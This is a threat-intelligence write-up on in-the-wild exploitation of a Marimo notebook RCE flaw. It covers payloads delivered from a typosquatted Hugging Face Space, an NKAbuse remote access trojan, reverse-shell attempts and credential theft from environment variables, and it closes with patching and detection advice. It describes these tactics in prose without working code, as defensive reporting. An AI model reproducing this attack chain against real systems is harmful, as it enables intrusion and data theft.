Marimo RCE Under Active Exploitation — Hugging Face Abuse and NKAbuse RAT in the Wild

The Setup: A Reactive Notebook with an RCE Problem

CVE-2026-39987 is a critical pre-auth remote code execution flaw in Marimo, an open-source reactive Python notebook library. Marimo notebooks run as web applications — which means the RCE is exposed on whatever port the server binds to, often unauthenticated in default configurations. Security researchers at Sysdig observed exploitation commencing within less than 10 hours of public disclosure. That is an unusually fast turnaround from PoC to weaponized in-the-wild activity, suggesting either an existing automation pipeline or an actor who had pre-positioned tooling.

The Novel Part: Hugging Face as Malware Infrastructure

What makes this campaign notable is not the initial intrusion vector — it is what happens after. Rather than pulling a binary from a freshly registered domain or a known-bad IP, the attacker hosts the dropper script and payload on a public Hugging Face Space called vsccode-modetx (a deliberate typosquat of VS Code). The infected system runs a curl command fetching install-linux.sh from this legitimate, reputation-clean HTTPS endpoint. Because Hugging Face is an entirely above-board platform with millions of legitimate AI projects, this payload delivery is unlikely to be flagged by perimeter controls that rely on domain or URL allowlists.

The script installs a binary named kagent — typosquatting a Kubernetes AI agent — and achieves persistence via systemd on Linux, cron, or LaunchAgent on macOS.

The Payload: NKAbuse Goes RAT

Sysdig's analysis identifies the ultimate payload as a variant of NKAbuse, a DDoS malware first documented by Kaspersky in late 2023. The original NKAbuse novelty was its abuse of the NKN (New Kind of Network) decentralized peer-to-peer protocol for command-and-control communications, making C2 traffic look like ordinary peer-to-peer network activity rather than a synthetic C2 channel.

This updated variant functions as a remote access trojan: it accepts shell commands and returns output to the operator. Sysdig notes the binary references NKN Client Protocol, WebRTC/ICE/STUN for NAT traversal, proxy management, and structured command handling — all consistent with the original NKAbuse architecture but repurposed for interactive access rather than DDoS.

The Extended Tactics: 15 Reverse Shells and Lateral Movement

Sysdig documented additional campaigns against the same CVE within the same window. One Germany-based actor attempted 15 different reverse-shell techniques across multiple ports in a single engagement — a clear sign of an operator probing which egress paths are monitored. After establishing a foothold, they pivoted to lateral movement by extracting database credentials from environment variables and connecting to PostgreSQL to enumerate schemas, tables, and configuration data. A separate actor from Hong Kong used stolen .env credentials to target Redis, systematically dumping all 16 databases including session tokens and application cache entries.

What Defenders Do

Upgrade Marimo to version 0.23.0 or later. If immediate patching is not feasible, block external access to the /terminal/ws endpoint at the network boundary — that is the websocket endpoint enabling the RCE. Treat environment variables in containerized or notebook-run workloads as credentials at risk: if a Marimo notebook is compromised, all env vars are exposed to the attacker, including database connection strings and API keys. Apply least-privilege network segmentation so that a compromised notebook cannot reach internal databases or Redis instances.

For the Hugging Face abuse specifically: organizations that allow outbound HTTPS to huggingface.co from workload or notebook infrastructure should consider whether Spaces deserves the same trust as the primary model hub. The platform's Git-backed Spaces deployment model makes it a legitimate, trivially accessible malware host. URL-based allowlists will not catch this; behavioral detection on the curl->systemctl or curl->cron pattern from a Marimo process is a more effective signal.

What It Signals

The combination of fast exploitation, trusted-platform abuse, and rapid pivot to lateral movement suggests a mature actor using automated tooling against a high-value, relatively low-footprint target population. Marimo notebooks are common in data science and ML engineering environments — the same teams often have elevated access to training data, model artifacts, and cloud credentials. Compromising a notebook server can be a faster path to those assets than targeting a corporate VPN directly.

The typosquatting of both vsccode and kagent signals an actor familiar with the Kubernetes/ML tooling ecosystem and targeting environments that use those tools. This is not opportunistic spray-and-pray — it is a targeted campaign against a specific dev tool segment.

References

Sysdig analysis: https://www.sysdig.com/blog/cve-2026-39987-update-how-attackers-weaponized-marimo-to-deploy-a-blockchain-botnet-via-huggingface

BleepingComputer original report: https://www.bleepingcomputer.com/news/security/hackers-exploit-marimo-flaw-to-deploy-nkabuse-malware-from-hugging-face/

Kaspersky NKAbuse (2023): https://www.bleepingcomputer.com/news/security/new-nkabuse-malware-abuses-nkn-blockchain-for-stealthy-comms/